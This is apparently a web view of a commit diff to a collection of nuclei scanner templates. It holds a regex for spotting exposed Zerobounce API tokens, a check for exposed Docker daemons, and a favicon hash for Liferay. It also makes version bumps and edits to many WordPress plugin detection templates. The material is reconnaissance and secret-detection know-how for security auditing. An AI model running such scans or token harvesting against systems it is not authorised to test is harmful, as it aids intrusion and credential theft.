|
||||
name: Zerobounce API Token
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
reference:
|
||||
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go
|
||||
- https://www.zerobounce.net/docs/email-validation-api-quickstart
|
||||
tags: exposure,token,zerobounce,api
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '([a-z0-9]{32})'
|
|
@ -1 +1 @@
|
|||
2.7.22
|
||||
2.7.23
|
|
@ -1 +1 @@
|
|||
3.8
|
||||
4.1
|
|
@ -1 +1 @@
|
|||
7.68
|
||||
7.69
|
|
@ -1 +1 @@
|
|||
3.1.20
|
||||
3.1.21
|
|
@ -1 +1 @@
|
|||
2.25.4
|
||||
2.25.5
|
|
@ -1 +1 @@
|
|||
6.3.6.1
|
||||
6.3.9
|
|
@ -1 +1 @@
|
|||
5.7.1
|
||||
5.7.2
|
|
@ -1 +1 @@
|
|||
1.13.3
|
||||
1.13.4
|
|
@ -1 +1 @@
|
|||
4.4.9
|
||||
4.5
|
|
@ -1 +1 @@
|
|||
1.5.2
|
||||
1.5.3
|
|
@ -1 +1 @@
|
|||
3.9.1
|
||||
3.9.2
|
|
@ -1 +1 @@
|
|||
5.5.1
|
||||
5.5.2
|
|
@ -1 +1 @@
|
|||
4.3.1
|
||||
4.3.2
|
|
@ -1 +1 @@
|
|||
1.21.0
|
||||
1.22.1
|
|
@ -1 +1 @@
|
|||
2.3.3
|
||||
2.3.5
|
|
@ -1 +1 @@
|
|||
1.89.0
|
||||
1.90.1
|
|
@ -1 +1 @@
|
|||
14.7.3
|
||||
14.8.3
|
|
@ -1 +1 @@
|
|||
9.2.12
|
||||
9.2.81
|
|
@ -1 +1 @@
|
|||
4.2.0
|
||||
4.3.0
|
|
@ -1 +1 @@
|
|||
5.6.14
|
||||
5.6.15
|
|
@ -1 +1 @@
|
|||
3.28.0
|
||||
3.28.2
|
|
@ -1 +1 @@
|
|||
1.8.5
|
||||
1.8.8
|
|
@ -1 +1 @@
|
|||
2.2.1
|
||||
2.2.3
|
|
@ -1 +1 @@
|
|||
4.9.44
|
||||
4.9.45
|
|
@ -1 +1 @@
|
|||
6.0.12
|
||||
6.0.14
|
|
@ -1 +1 @@
|
|||
1.0.103.1
|
||||
1.0.105
|
|
@ -1 +1 @@
|
|||
1.45.0
|
||||
1.46.0
|
|
@ -1 +1 @@
|
|||
1.14
|
||||
2.0.1
|
|
@ -1 +1 @@
|
|||
2.4.3
|
||||
2.4.4
|
|
@ -1 +1 @@
|
|||
2.1.1
|
||||
2.2.0
|
|
@ -1 +1 @@
|
|||
5.5.1
|
||||
5.6.1
|
|
@ -1 +1 @@
|
|||
5.1.2
|
||||
5.2.0
|
|
@ -1 +1 @@
|
|||
7.2.0
|
||||
7.2.2
|
|
@ -1 +1 @@
|
|||
19.12
|
||||
19.13
|
|
@ -1 +1 @@
|
|||
13.2.8
|
||||
13.2.10
|
|
@ -1 +1 @@
|
|||
4.4.1
|
||||
4.5.1
|
|
@ -2,7 +2,7 @@ id: exposed-dockerd
|
|||
|
||||
info:
|
||||
name: Docker Daemon Exposed
|
||||
author: arafat
|
||||
author: arafatansari
|
||||
severity: critical
|
||||
description: |
|
||||
Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
|
||||
|
|
|
@ -2640,3 +2640,8 @@ requests:
|
|||
name: "Leica RefWorx"
|
||||
dsl:
|
||||
- "status_code==200 && (\"-1054477011\" == mmh3(base64_py(body)))"
|
||||
|
||||
- type: dsl
|
||||
name: "Liferay"
|
||||
dsl:
|
||||
- "status_code==200 && (\"-2024949122\" == mmh3(base64_py(body)))"
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/akismet/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/amp/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt"
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: wordpress-duplicator
|
||||
|
||||
info:
|
||||
name: Duplicator – WordPress Migration Plugin Detection
|
||||
name: Duplicator – WordPress Migration & Backup Plugin Detection
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt"
|
||||
|
||||
|
|
|
@ -13,8 +13,7 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt"
|
||||
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue